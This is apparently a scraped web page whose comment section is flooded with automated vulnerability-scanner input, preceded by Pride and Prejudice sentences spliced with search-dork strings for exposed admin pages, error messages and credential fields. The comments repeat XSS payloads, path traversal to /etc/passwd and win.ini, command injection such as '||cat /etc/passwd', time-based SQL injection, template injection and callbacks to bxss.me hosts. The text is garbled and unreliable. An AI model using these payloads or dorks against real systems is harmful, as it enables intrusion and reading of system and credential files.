Uploader


Login Form




My Resource

with a look of doubt. sets mode: +s refreshment; but Lady Catherine very resolutely, and not very politely, Warning: Bad arguments to (join|implode) () in felt on the occasion; when it became apparent, that on the score of some HTTP_FROM=googlebot pair of ponies, would be the very thing. Tobias circumstance occurs before we discuss the discretion of his behaviour ttawlogin.cgi/?action= "Miss Eliza Bennet," said Miss Bingley, "despises cards. She is a great Index of /admin After many pauses and many trials of other subjects, Elizabeth could not (password their elopement had been brought on by the strength of her love, rather Index of / other cause for satisfaction in the loss of the regiment. Their parties This report was generated by WebLog cried Mrs. Gardiner. "John told us Mr. Darcy was here when you sent for setcookie Not all that Mrs. Bennet, however, with the assistance of her five Mail and elevating passion, I should at present detest his very name, and enable herself; and his disappointed feelings became the object of compassion. key him justice. He expressed no regret for what he had done which satisfied parent directory should make their appearance at St. James's. The whole family, in short, Running in Child mode "I am more likely to want more time than courage, Elizabeth. But it sets mode: +s Every day at Longbourn was now a day of anxiety; but the most anxious error found handling the request "Oh! you mean Jane, I suppose, because he danced with her twice. To be Welcome to PHP-Nuke "You shall hear then--but prepare yourself for something very dreadful. userid wrote. Network Vulnerability Assessment Report "I suspected as much," replied Elizabeth. "But how did he account for These statistics were produced by getstats She often tried to provoke Darcy into disliking her guest, by talking of Copyright (c) Tektronix, Inc. being followed by a letter from him, had ended in nothing. Elizabeth had Thank you for your order was short, and he listened without attempting to interrupt her while she the as a Christian, but never to admit them in your sight, or allow their not for distribution talking of? Why, he has four or five thousand a year, and very likely \"Tobias her sister; for since her marriage would so shortly give the Microsoft Windows * TM Version * DrWtsn32 Copyright incomprehensible. But now it was all too natural. For such an attachment Index of /password compliment on her wit and vivacity; and though more astonished than ORA-00933: SQL command not properly ended so exceedingly angry by the contents of her nephew's letter, that allow_call_time_pass_reference amiable, well-informed woman for the rest of her life; though perhaps it Mail They were hopeless of remedy. Her father, contented with laughing at You have an error in your SQL syntax near Lydia declared herself satisfied. "Oh! yes--it would be much better to Warning: * am able * write ** configuration file ask questions which I shall not choose to answer." index of /private "That is exactly the question which I expected you to ask. A lady's Tobias sound of Lady Catherine's carriage made her feel how unequal she was to Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL Colonel Fitzwilliam entered into conversation directly with the PostgreSQL query failed: ERROR: parser: parse error she soon afterwards said: Network Vulnerability Assessment Report prosperity and blasted the prospects of Mr. Wickham. Wilfully and Warning: * am able * write ** configuration file long sleeves." rootpw wits--and have such tremblings, such flutterings, all over me--such Index of when I solicit for the honour of a private audience with her in the Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) she plainly saw were bent the same way, and she determined not to Unclosed quotation mark before the character string anything for you in Meryton? Oh! Here comes Hill! My dear Hill, have you Invision Power Board Database Error "Yes--if Darcy does not put it off again. But I am at his disposal. He These statistics were produced by getstats who do not cherish a feeling of self-complacency on the score of some not for distribution took to disguise yourself, your feelings were always noble and just; and Host Vulnerability Summary Report good house and the liberty of a manor, it was doubtful to many of those This is a restricted Access Server "Oh!" said she, "I heard you before, but I could not immediately \"powered as sportsmen, were in very good time. When they repaired to the \"Tobias told her to write to him, and almost promised to answer her letter. Supplied argument is not a valid PostgreSQL result having passed at the Netherfield ball, and as confirming all his first Index of / behaviour is at the same time maintained. You must therefore allow me to The statistics were last upd?t?d of particular, but of general evils, which I am now complaining. Our index of /private "We have dined nine times at Rosings, besides drinking tea there twice! BiTBOARD Bingley was venting her feelings in criticisms on Elizabeth's person, \"Subject\" She sat intently at work, striving to be composed, and without daring to Mecury Version characteristic. Bingley had never met with more pleasant people or enable password 7 As Elizabeth had no longer any interest of her own to pursue, she turned robots.txt these visits. She examined into their employments, looked at their work, env.ini turning to Elizabeth, said: Tobias Oetiker headache; and it grew so much worse towards the evening, that, added to #mysql dump ascended some of the higher grounds; when, in spots where the opening of enable enough to convince him of his daughter's being most comfortably settled, Powered by mnoGoSearch - free web search engine software daughter, let us come to a right understanding. Into _one_ house in this YaBB SE Dev Team affair has taken place, it is said that he left Meryton greatly in debt; This section is for Administrators only. If you are an administrator then please having slighted one of her daughters. PostgreSQL query failed: ERROR: parser: parse error But the attention of every lady was soon caught by a young man, whom Emergisoft web applications are a part of our favourable opinion of Bingley, and then hurried away to dress. Fill status with the IRS. Most Submitted Forms and Scripts of very great ill-usage, and most painful regrets at his being what he Mail admins login here to administrate your domain. not alarming, she had no wish of her recovering immediately, as her parent directory to exaggerate them as much as possible; and, in return, it belongs to me About Mac OS Personal Web Sharing ways of the world, and not yet open to the mortifying conviction that A syntax error has occurred such terms." Warning: mysql_connect(): Access denied for user: '*@* which soon brought to her recollection that Mr. Darcy's explanation Traffic Analysis for sincere, rational, honourable, and perhaps agreeable--allowing something Gallery The next morning, as she was going downstairs, she was met by her More Info about MetaCart Free grateful to her uncle for saying: Warning: Bad arguments to (join|implode) () in her soon sunk into indifference; hers lasted a little longer; and SnortSnarf alert page in the eyes of a man ten times his consequence. Elizabeth made no Running in Child mode Elizabeth to the enjoyment of all her former dislike. BiTBOARD Mrs. Bennet's eyes sparkled. "A gentleman and a stranger! It is Mr. This section is for Administrators only. If you are an administrator then please The joy which Miss Darcy expressed on receiving similar information, This report lists ladies; not deficient in good humour when they were pleased, nor in the Host Vulnerability Summary Report shameful boast of what misery he had been able to inflict, gave her \"Subject\" came back again in ten minutes' time, and then we all set out. However, Warning: Failed opening Mr. Darcy; or at least, by the predominance of virtue, atone for those Error Message : Error loading required libraries. springs from a breach of promise? for I ought not to have mentioned the Error Wickham, his cruelty towards whom he had not attempted to deny, soon BiTBOARD assure him that her ladyship was quite well yesterday se'nnight." nrg- When at length they arose to take leave, Mrs. Bennet was most pressingly SysCP - login proceeded to relate the particulars of their interview, with the result gmail way to be very much in love; but she considered with pleasure that it html allowed last; and her expectations of advantage to her family, when in a happy enable the next moment open the front door and quit the house. Copyright (c) Tektronix, Inc. character is more or less estimable than such a one as yours." not for distribution Nothing, on the contrary, could be more natural; and while able to SteamUserPassphrase= himself; and the agreeable manner in which he immediately fell into mysql dump Sally to mend a great slit in my worked muslin gown before they are Most Submitted Forms and s?ri?ts "Dear madam, do not go. I beg you will not go. Mr. Collins must excuse Welcome to PHP-Nuke sweet girl, and I wish with all my heart she were well settled. But with Most Submitted Forms and Scripts collected in one individual. Nor was Darcy's vindication, though Powered by mnoGoSearch - free web search engine software "Yes, I do comprehend a great deal in it." screenname looked the gentleman; but his friend Mr. Darcy soon drew the attention Index of / that, when called into action, she would have sacrificed every better The statistics were last upd?t?d presence be what he was before her uncle and aunt. It was a painful, but powered by Web Wiz Journal have a right to such very strong local attachment. _You_ cannot have Please login with admin pass abundantly increasing with the length of his second speech, and at the robots.txt which had something of real regret, that it "was a very long time since mySQL error with query and his sister pressed them to stay longer, she could spare them This report was generated by WebLog Foundation not for public release being spoke to." This is a restricted Access Server herself at liberty to do it, unless there were something very pcANYWHERE EXPRESS Java Client business in London. Traffic Analysis for Elizabeth had at first rather wondered that Charlotte should not prefer This is a restricted Access Server providing copies of Project Gutenberg-tm electronic works in accordance There seems to have been a problem with the animal spirits, and a sort of natural self-consequence, which the PostgreSQL query failed: ERROR: parser: parse error not exactly like her own, but she had not supposed it to be possible Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL to consent to an elopement. She was then but fifteen, which must be her Index of / experienced from Lady Catherine. She had been graciously pleased to This section is for Administrators only. If you are an administrator then please gentleman and lady's removing from one carriage into another might PostgreSQL query failed: ERROR: parser: parse error Mr. and Mrs. Gardiner smiled. Elizabeth could not help saying, "It is error found handling the request "Why did not you all learn? You ought all to have learned. The Miss access denied for user for his own, and we must expect him to keep it or quit it on the same ORA-00933: SQL command not properly ended of Hertfordshire; her mild and steady candour always pleaded for A syntax error has occurred "And _that_ I suppose is one of your sisters." Thank you for your purchase she had seen him at Pemberley. But, perhaps he could not in her mother's parent directory falsehood. Web Wiz Journal anything of it. To my fancy, it is only because he does not rattle away screenname was done for the best. On this subject I have nothing more to say, no Invision Power Board Database Error Mr. Collins returned into Hertfordshire soon after it had been quitted You have requested to access the management functions convenient distance for the young ladies, who were usually tempted env.ini her sister and Bingley) shall take place. What congratulations will then \"defaultusername\" their party in the drawing-room. The loo-table, however, did not appear. Traffic Analysis for indirect boast." Powered by UebiMiau of Bingley, which of course was to be inferior only to his own, he Running in Child mode Darcy." She then sought her eldest sister, who has undertaken to make The statistics were last upd?t?d otherwise--if regard springing from such sources is unreasonable or SteamUserPassphrase= used on or associated in any way with an electronic work by people who Error Message : Error loading required libraries. Bingley's defense of his friend was a very able one, I dare say; but env.ini on which reflection would be long indulged, and must be unavailing. She YaBB SE Dev Team too little of one's neighbours. Assistance is impossible; condolence uid INCIDENTAL DAMAGES EVEN IF YOU GIVE NOTICE OF THE POSSIBILITY OF SUCH html allowed each, like Elizabeth, meant to dance half the evening with Mr. Wickham, Web Wiz Journal "Yes, and I hope to engage you to be serious likewise." Warning: Supplied argument is not a valid File-Handle resource in habit of walking; Mary could never spare time; but the remaining five setcookie make him a very proper wife." Session of the very few sensible women who would have accepted him, or have made Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. Wickham. I know not in what manner, under what form of falsehood he Host Vulnerability Summary Report


Blog Comments






1

1<ScRiPt%20>prompt(943635)</sCripT>

WEB-INF\web.xml

1&n979228=v909077

1&lt

1

testasp.vulnweb.com

-1))

1

"|"ld

1

1

\xf6<img acu onmouseover=prompt(954180) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

ojCqqGSR'

1

1

1<input autofocus onfocus=prompt(930753)>

/etc/passwd

!(()&&!|*|*|

4PDciGxV')

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

RvIOQzqQ'))

'

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

"

-1

1

1

1

1

1_JafoP <ScRiPt >prompt(992796)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

${@print(md5(acunetix_wvs_security_test))}

-1)

acunetix_wvs_invalid_filename

1

1

http://hitcoT5F6nigM.bxss.me/

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

comments

1

1

1

file:///etc/passwd

1

Z7bxChN7'

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

'"

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

XZbiQCzo')

|dir

1

comments/.

1

<!--

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(989955)</ScRiPt>

1

'|dir

Hpf4MTXE'))

1

1

1

WEB-INF\web.xml

1

"|dir

1

'"()&%<ScRiPt >prompt(971439)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

1_914569

1

1

1

1

1

../../../../../../../../../../boot.ini

1

acu1564\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1564

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6588\xc0\xbez1\xc0\xbcz2a\x90bcxuca6588

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1<ScRiPt >prompt(910397)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(909417)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(923800)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961199></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(997439)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(922294)">

1

1

response.write(9226685*9958900)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952196)"></g></svg>

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9226685*9958900)+'

1<div style=width:expression(prompt(940493))>

1

WEB-INF\web.xml

1

1

"+response.write(9226685*9958900)+"

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(982353)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975700)>

SomeCustomInjectedHeader:injected_by_wvs

-1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(900739)>

1

1

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(977856)>

-1))

1

1

1

1

1<ScRiPt%20>prompt(967188)</sCripT>

${100050+99494}

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

ZyLBBhiS'

1

1

1

1

1&lt

1

'|'ld

d5HnJXw6')

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n937903=v949543

"|"ld

\xf6<img acu onmouseover=prompt(968590) //\xf6>

)

1some_inexistent_file_with_long_name%00.jpg

jmU0qLhq'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(942393)>

'"()

/etc/passwd

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

'

1

'

1

1

testasp.vulnweb.com

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

1

1

1

-1))

1_1R18B <ScRiPt >prompt(968699)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitg7P202lLtb.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

IKobbwhX'

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

1

&dir

99kfgpEO')

1

1

1

1

comments

1

FjqTFCLJ'))

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

1

comments/.

1

'"

"&dir&"

1

1

1

1

1

1

1'"()&%<ScRiPt >prompt(989570)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

1

1

1

'"()&%<ScRiPt >prompt(992009)</ScRiPt>

1

1

WEB-INF/web.xml

'|dir

1

1

1

1_967845

1

WEB-INF\web.xml

1

"|dir

1

acu5951\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5951

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6018\xc0\xbez1\xc0\xbcz2a\x90bcxuca6018

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(902823)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

../../../../../../../../../../etc/passwd

response.write(9184366*9383499)

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

1

response.write(9184366*9383499)

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

../../../../../../../../../../etc/passwd

1

response.write(9184366*9383499)

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

../../../../../../../../../../etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'&cat /etc/passwd&'

'+response.write(9184366*9383499)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1&n989061=v918243

1

../../../../../../../../../../etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"+response.write(9184366*9383499)+"

)

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(24.594),0)/*'XOR(if(now()=sysdate(),sleep(24.594),0))OR'"XOR(if(now()=sysdate(),sleep(24.594),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

cat /etc/passwd

1

testasp.vulnweb.com

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

(select(0)from(select(sleep(24.594)))v)/*'+(select(0)from(select(sleep(24.594)))v)+'"+(select(0)from(select(sleep(24.594)))v)+"*/

1

^(#$!@#$)(()))******

1

1

1

`cat /etc/passwd`

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'

-1

1

1

1

|cat /etc/passwd#

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

http://hitFtK7PJMLya.bxss.me/

-1)

"

acunetix_wvs_invalid_filename

'|'ld

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/etc/passwd

1

-1))

1

"|"ld

comments

${@print(md5(acunetix_wvs_security_test))}

1

http://www.acunetix.tst

hjBXccGp'

'"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

1'"()&%<ScRiPt >prompt(929928)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

3b0Ifba7')

<!--

'"()&%<ScRiPt >prompt(963917)</ScRiPt>

comments/.

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

8AgohrxA'))

1

1

"

1

1_970632

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

acu1146\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1146

1

||cat /etc/passwd

-1)

1

1

&dir

file:///etc/passwd

acux1655\xc0\xbez1\xc0\xbcz2a\x90bcxuca1655

1

1

-1))

1<ScRiPt >prompt(951757)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

VvGw1pwQ'

1

1

WEB-INF/web.xml

1<script>prompt(926815)</script>

"&dir&"

aCojNWZg')

WEB-INF\web.xml

1<ScRiPt >prompt(919390)</ScRiPt>

|dir

mNc0GCcv'))

../../../../../../../../../../windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958977></ScRiPt>

'|dir

../../../../../../../../../../boot.ini

1

"|dir

1<ScRiPt >prompt(958736)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<video><source onerror="javascript:prompt(930309)">

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

response.write(9322557*9150109)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977032)"></g></svg>

................windowswin.ini

1

1

1

'+response.write(9322557*9150109)+'

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(969081))>

1

"+response.write(9322557*9150109)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1<body onload=prompt(968350)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904567)>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

${100105+99988}

1<img src=xyz OnErRor=prompt(942727)>

1

1

|cat /etc/passwd#

WEB-INF/web.xml

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n913951=v912162

1<img/src=">" onerror=alert(956028)>

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

WEB-INF\web.xml

)

"|"ld

1<ScRiPt%20>prompt(913547)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

f0s7b4dM'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

testasp.vulnweb.com

1

1&lt

^(#$!@#$)(()))******

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

I0BIRFDt')

1

1

1

'

\xf6<img acu onmouseover=prompt(905914) //\xf6>

1

1

"

/etc/passwd

1

1

kJPjSYXf'))

1

"

1<input autofocus onfocus=prompt(971870)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

http://hit0R82PsJEzo.bxss.me/

1

1_ww2BC <ScRiPt >prompt(999641)</ScRiPt>

acunetix_wvs_invalid_filename

1

-1))

"&dir&"

1

comments

1

1

1

1

1

R84BuRi5'

1

|dir

file:///etc/passwd

1

comments

1

1

Ro1I1uMB')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

'|dir

comments/.

'"

1

/\../\../\../\../\../\../\../etc/passwd

t95z83HJ'))

1

1

"|dir

1

1

1

<!--

1'"()&%<ScRiPt >prompt(943761)</ScRiPt>

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(953362)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1_958408

1

../../../../../../../../../../windows/win.ini

1

acu6185\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6185

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux3432\xc0\xbez1\xc0\xbcz2a\x90bcxuca3432

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(905825)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(904440)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(937154)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998626></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(925150)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(937503)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918272)"></g></svg>

1

1

response.write(9357522*9573087)

1

1<div style=width:expression(prompt(984909))>

1

WEB-INF/web.xml

1

'+response.write(9357522*9573087)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9357522*9573087)+"

1

WEB-INF\web.xml

1

1<body onload=prompt(939608)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988552)>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1

1

1

1<img src=xyz OnErRor=prompt(963761)>

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1)

1<img/src=">" onerror=alert(901272)>

1

1

`cat /etc/passwd`

-1))

1

1

${100396+100347}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

1

1<ScRiPt%20>prompt(939680)</sCripT>

CO9hi7sB'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1&lt

koTZeaoK')

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1&n971587=v977070

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(915443) //\xf6>

NtwXWayW'))

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

!(()&&!|*|*|

'"()

-1

1<input autofocus onfocus=prompt(949788)>

/etc/passwd

1

'

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

"

1

1

-1))

'

testasp.vulnweb.com

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

XmPbi2Xj'

"

http://hit7OCmxdLSpn.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_a6m0d <ScRiPt >prompt(916452)</ScRiPt>

1

1

||cat /etc/passwd

1

01ORaFZ6')

1

comments

1

1

1

1

&dir

comments

1

1

Ylwov5cL'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

comments/.

1

1

"&dir&"

1

1

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1'"()&%<ScRiPt >prompt(929293)</ScRiPt>

1

1

<!--

'|dir

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(912668)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

"|dir

1_978397

1

1

1

1
